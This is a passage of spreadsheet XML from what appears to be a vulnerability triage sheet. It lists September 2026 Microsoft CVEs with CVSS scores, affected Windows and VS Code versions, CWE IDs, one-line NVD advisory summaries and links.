      <c r="L573" s="5" t="inlineStr"/>
      <c r="M573" s="5" t="inlineStr"/>
      <c r="N573" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O573" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P573" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q573" s="5" t="inlineStr"/>
      <c r="R573" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S573" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69864</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69900</t>
        </is>
      </c>
      <c r="D574" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E574" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F574" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I574" s="5" t="inlineStr"/>
      <c r="J574" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K574" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L574" s="5" t="inlineStr"/>
      <c r="M574" s="5" t="inlineStr"/>
      <c r="N574" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O574" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P574" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q574" s="5" t="inlineStr"/>
      <c r="R574" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S574" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69900</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69907</t>
        </is>
      </c>
      <c r="D575" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E575" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F575" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G575" s="5" t="inlineStr"/>
      <c r="H575" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I575" s="5" t="inlineStr"/>
      <c r="J575" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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75" s="5" t="inlineStr"/>
      <c r="M575" s="5" t="inlineStr"/>
      <c r="N575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O575" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P575" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q575" s="5" t="inlineStr"/>
      <c r="R575" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="S575" s="5" t="inlineStr">
        <is>
          <t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69921</t>
        </is>
      </c>
      <c r="D576" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E576" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F576" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I576" s="5" t="inlineStr"/>
      <c r="J576" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K576" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L576" s="5" t="inlineStr"/>
      <c r="M576" s="5" t="inlineStr"/>
      <c r="N576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O576" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P576" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q576" s="5" t="inlineStr"/>
      <c r="R576" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S576" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70289</t>
        </is>
      </c>
      <c r="D577" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E577" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F577" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G577" s="5" t="inlineStr"/>
      <c r="H577" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I577" s="5" t="inlineStr"/>
      <c r="J577" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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7" s="5" t="inlineStr"/>
      <c r="M577" s="5" t="inlineStr"/>
      <c r="N577" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O577" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P577" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q577" s="5" t="inlineStr"/>
      <c r="R577" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S577" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70289</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70334</t>
        </is>
      </c>
      <c r="D578" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E578" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F578" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I578" s="5" t="inlineStr"/>
      <c r="J578" s="5" t="inlineStr"/>
      <c r="K578" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L578" s="5" t="inlineStr"/>
      <c r="M578" s="5" t="inlineStr"/>
      <c r="N578" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O578" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P578" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q578" s="5" t="inlineStr"/>
      <c r="R578" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="S578" s="5" t="inlineStr">
        <is>
          <t>Incomplete list of disallowed inputs in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="T578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70334</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70564</t>
        </is>
      </c>
      <c r="D579" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E579" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F579" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I579" s="5" t="inlineStr"/>
      <c r="J579" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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9" s="5" t="inlineStr"/>
      <c r="M579" s="5" t="inlineStr"/>
      <c r="N579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O579" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P579" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q579" s="5" t="inlineStr"/>
      <c r="R579" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S579" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70569</t>
        </is>
      </c>
      <c r="D580" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E580" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F580" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G580" s="5" t="inlineStr"/>
      <c r="H580" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I580" s="5" t="inlineStr"/>
      <c r="J580" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K580" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L580" s="5" t="inlineStr"/>
      <c r="M580" s="5" t="inlineStr"/>
      <c r="N580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O580" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P580" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q580" s="5" t="inlineStr"/>
      <c r="R580" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S580" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70572</t>
        </is>
      </c>
      <c r="D581" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E581" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F581" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G581" s="5" t="inlineStr"/>
      <c r="H581" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I581" s="5" t="inlineStr"/>
      <c r="J581" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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81" s="5" t="inlineStr"/>
      <c r="M581" s="5" t="inlineStr"/>
      <c r="N581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O581" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P581" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q581" s="5" t="inlineStr"/>
      <c r="R581" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S581" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70574</t>
        </is>
      </c>
      <c r="D582" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E582" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F582" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I582" s="5" t="inlineStr"/>
      <c r="J582" s="5" t="inlineStr"/>
      <c r="K582" s="5" t="inlineStr"/>
      <c r="L582" s="5" t="inlineStr"/>
      <c r="M582" s="5" t="inlineStr"/>
      <c r="N582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O582" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P582" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q582" s="5" t="inlineStr"/>
      <c r="R582" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S582" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70574</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70581</t>
        </is>
      </c>
      <c r="D583" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E583" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F583" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I583" s="5" t="inlineStr"/>
      <c r="J583" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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83" s="5" t="inlineStr"/>
      <c r="M583" s="5" t="inlineStr"/>
      <c r="N583" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O583" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P583" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q583" s="5" t="inlineStr"/>
      <c r="R583" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-20</t>
        </is>
      </c>
      <c r="S583" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70583</t>
        </is>
      </c>
      <c r="D584" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E584" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F584" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I584" s="5" t="inlineStr"/>
      <c r="J584" s="5" t="inlineStr"/>
      <c r="K584" s="5" t="inlineStr"/>
      <c r="L584" s="5" t="inlineStr"/>
      <c r="M584" s="5" t="inlineStr"/>
      <c r="N584" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O584" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P584" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q584" s="5" t="inlineStr"/>
      <c r="R584" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S584" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70583</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70584</t>
        </is>
      </c>
      <c r="D585" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E585" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F585" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G585" s="5" t="inlineStr"/>
      <c r="H585" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I585" s="5" t="inlineStr"/>
      <c r="J585" s="5" t="inlineStr"/>
      <c r="K585" s="5" t="inlineStr"/>
      <c r="L585" s="5" t="inlineStr"/>
      <c r="M585" s="5" t="inlineStr"/>
      <c r="N585" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O585" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P585" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q585" s="5" t="inlineStr"/>
      <c r="R585" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S585" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70584</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71334</t>
        </is>
      </c>
      <c r="D586" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E586" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F586" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G586" s="5" t="inlineStr"/>
      <c r="H586" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I586" s="5" t="inlineStr"/>
      <c r="J586" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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86" s="5" t="inlineStr"/>
      <c r="M586" s="5" t="inlineStr"/>
      <c r="N586" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O586" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P586" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q586" s="5" t="inlineStr"/>
      <c r="R586" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S586" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71337</t>
        </is>
      </c>
      <c r="D587" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E587" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F587" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G587" s="5" t="inlineStr"/>
      <c r="H587" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I587" s="5" t="inlineStr"/>
      <c r="J587" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K587" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L587" s="5" t="inlineStr"/>
      <c r="M587" s="5" t="inlineStr"/>
      <c r="N587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O587" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P587" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q587" s="5" t="inlineStr"/>
      <c r="R587" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-130</t>
        </is>
      </c>
      <c r="S587" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71337</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71343</t>
        </is>
      </c>
      <c r="D588" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E588" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F588" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G588" s="5" t="inlineStr"/>
      <c r="H588" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I588" s="5" t="inlineStr"/>
      <c r="J588" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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88" s="5" t="inlineStr"/>
      <c r="M588" s="5" t="inlineStr"/>
      <c r="N588" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O588" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P588" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q588" s="5" t="inlineStr"/>
      <c r="R588" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S588" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71343</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71345</t>
        </is>
      </c>
      <c r="D589" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E589" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F589" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G589" s="5" t="inlineStr"/>
      <c r="H589" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I589" s="5" t="inlineStr"/>
      <c r="J589" s="5" t="inlineStr"/>
      <c r="K589" s="5" t="inlineStr"/>
      <c r="L589" s="5" t="inlineStr"/>
      <c r="M589" s="5" t="inlineStr"/>
      <c r="N589" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O589" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P589" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q589" s="5" t="inlineStr"/>
      <c r="R589" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S589" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71345</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72929</t>
        </is>
      </c>
      <c r="D590" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E590" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F590" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G590" s="5" t="inlineStr"/>
      <c r="H590" s="5" t="n">
